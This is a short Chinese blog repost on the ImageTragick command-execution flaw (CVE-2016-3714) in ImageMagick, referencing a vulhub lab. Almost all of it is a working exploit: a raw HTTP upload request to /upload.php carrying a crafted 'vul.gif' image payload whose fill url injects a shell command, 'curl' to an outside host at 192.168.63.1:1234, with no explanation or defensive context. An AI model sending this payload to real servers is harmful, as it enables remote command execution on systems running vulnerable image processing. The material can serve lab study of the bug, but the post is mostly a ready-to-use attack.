Imagetragick 命令执行漏洞（CVE-2016–3714）

最新推荐文章于 2024-05-21 09:41:01 发布

ddr12231

最新推荐文章于 2024-05-21 09:41:01 发布

阅读量278

点赞数

文章标签： php 操作系统

原文链接：http://www.cnblogs.com/mrhonest/p/11399914.html

版权

POST /upload.php HTTP/1.1
Host: your-ip
Content-Length: 315
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydGYwkOC91nnON1ws
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Connection: close

------WebKitFormBoundarydGYwkOC91nnON1ws
Content-Disposition: form-data; name="file_upload"; filename="vul.gif"
Content-Type: image/jpeg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|curl "192.168.63.1:1234)'
pop graphic-context
------WebKitFormBoundarydGYwkOC91nnON1ws--

参考:https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md

转载于:https://www.cnblogs.com/mrhonest/p/11399914.html

ddr12231

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Imagetragick 命令执行漏洞（CVE-2016–3714）

POST /upload.php HTTP/1.1Host: your-ipContent-Length: 315Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (K...
复制链接

扫一扫